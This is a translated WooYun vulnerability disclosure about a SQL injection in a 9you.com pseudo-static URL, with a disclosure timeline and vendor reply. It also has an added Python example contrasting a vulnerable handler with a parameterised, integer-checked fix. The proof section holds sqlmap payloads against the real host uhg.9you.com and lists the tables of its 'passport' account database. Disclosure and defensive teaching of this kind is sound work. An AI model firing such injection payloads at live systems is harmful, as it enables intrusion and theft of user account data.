
Vulnerability Summary

Defect ID: wooyun-2015-0162489

Title: Pseudo-static SQL injection at 久游网 (9you.com) exposing the account and password information of 6.43 million users

Affected vendor: 久游网

Author: 小川

Submitted: 2015-12-18 17:32

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-12-18: Details sent to the vendor, awaiting vendor handling
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public

Brief description:

Whenever 9you comes up, I find myself humming: "The boundless horizon is my love..."

Detailed description:

[image: ragecomic.png]

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+

Fix recommendation:

Honest to goodness, I did not dump the database, and as for the information in the vip database, I did not even look at it. Just run the parameter through intval.

Copyright notice: when reposting, please credit the source as 小川@乌云
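The injection point sqlmap reports is the `game_id` segment of a pseudo-static URL (`/vip/mall/index/game_id/76.html`), and the author's fix is to cast it to an integer. The following is an added example, not code from the report or from 9you.com: it models in Python, with an in-memory SQLite table standing in for the MySQL backend, the routing and query pattern that produces this class of bug, beside a hardened handler that applies the strict integer check the author recommends and binds the value as a query parameter. The route layout (three leading path segments, then key/value pairs), the table and column names, and the request paths are constructed assumptions; the probe path is the first boolean-based payload quoted above.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the MySQL "vip" mall table; the table
# and column names are assumed, not taken from the vendor's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mall_item (id INTEGER, game_id INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO mall_item VALUES (?, ?, ?)",
        [(1, 76, "item-a"), (2, 76, "item-b"), (3, 77, "item-c")],
    )
    return conn


def parse_pseudo_static(path):
    """Map /vip/mall/index/game_id/76.html to {'game_id': '76'}.

    Pseudo-static routing (assumed here: three leading segments for module,
    controller and action, then key/value pairs, then a trailing .html)
    yields plain strings, so game_id is caller-controlled text until it is
    validated. The .html suffix is not a type boundary.
    """
    if path.endswith(".html"):
        path = path[: -len(".html")]
    segments = path.strip("/").split("/")
    kv = segments[3:]
    return dict(zip(kv[0::2], kv[1::2]))


def handle_request_vulnerable(conn, path):
    # The pattern behind the report: the routed value is spliced into the SQL
    # text, and the surrounding parentheses match the ") AND ... AND (" shape
    # of the payloads sqlmap found.
    game_id = parse_pseudo_static(path).get("game_id", "")
    sql = "SELECT name FROM mall_item WHERE (game_id = %s)" % game_id
    return {"status": 200, "items": [row[0] for row in conn.execute(sql)]}


def to_int_or_none(value):
    """Strict integer check, the fix the author asks for.

    PHP's intval() would also neutralise the payload (it coerces
    "76) AND ..." to 76 by reading the numeric prefix), but it does so
    silently; rejecting anything that is not a plain decimal integer gives
    the same protection plus a 400 response that can be logged and alerted on.
    """
    if re.fullmatch(r"-?\d{1,10}", value):
        return int(value)
    return None


def handle_request_hardened(conn, path):
    raw = parse_pseudo_static(path).get("game_id", "")
    game_id = to_int_or_none(raw)
    if game_id is None:
        # Detection hook: a non-numeric game_id in a pseudo-static URL is a
        # strong injection-probe signal; log the raw value here.
        return {"status": 400, "items": []}
    # Parameter binding: the value never becomes part of the SQL text.
    rows = conn.execute(
        "SELECT name FROM mall_item WHERE game_id = ?", (game_id,)
    )
    return {"status": 200, "items": [row[0] for row in rows]}


# Constructed request paths: a normal request and the first boolean-based
# blind payload quoted in the report.
NORMAL_PATH = "/vip/mall/index/game_id/76.html"
PROBE_PATH = "/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html"

if __name__ == "__main__":
    db = make_db()
    print(handle_request_vulnerable(db, PROBE_PATH))  # tautology accepted as valid SQL
    print(handle_request_hardened(db, PROBE_PATH))    # rejected with status 400
```

The vulnerable handler returns the same rows for the tautology probe as for a normal request, which is exactly the true/false oracle a boolean-based blind technique relies on; the hardened handler refuses the request before any SQL is built, and the parameterised query means that even a value that passed validation could never alter the statement's structure.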


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-12-18 22:53

Vendor reply:

Scanner or by hand? Pretty impressive that you even found this one.
Definitely 20 points.

Latest status:

None yet